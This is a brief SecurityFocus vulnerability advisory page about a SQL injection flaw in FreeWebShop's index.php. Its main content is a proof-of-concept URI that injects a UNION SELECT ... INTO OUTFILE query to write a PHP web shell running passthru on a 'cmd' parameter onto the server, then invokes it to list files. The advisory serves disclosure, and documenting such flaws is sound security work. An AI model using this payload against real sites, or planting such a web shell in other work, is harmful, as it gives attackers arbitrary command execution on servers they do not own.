Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

FreeWebShop Index.PHP SQL Injection Vulnerability

An attacker can exploit this issue via a web client.

The following proof-of-concept URI demonstrates this vulnerability:

http://www.example.com/index.php?page=details&prod=1337%20UNION%20SELECT%201,2,3,%22%3C?php%20passthru($_GET['cmd'])%20?%3E%22,5,6,7,8%20FROM%20customer%20INTO%20OUTFILE%20'[NEWPATH]/fork.php'/langs/uk/fork.php?cmd=ls







 

Privacy Statement
Copyright 2009, SecurityFocus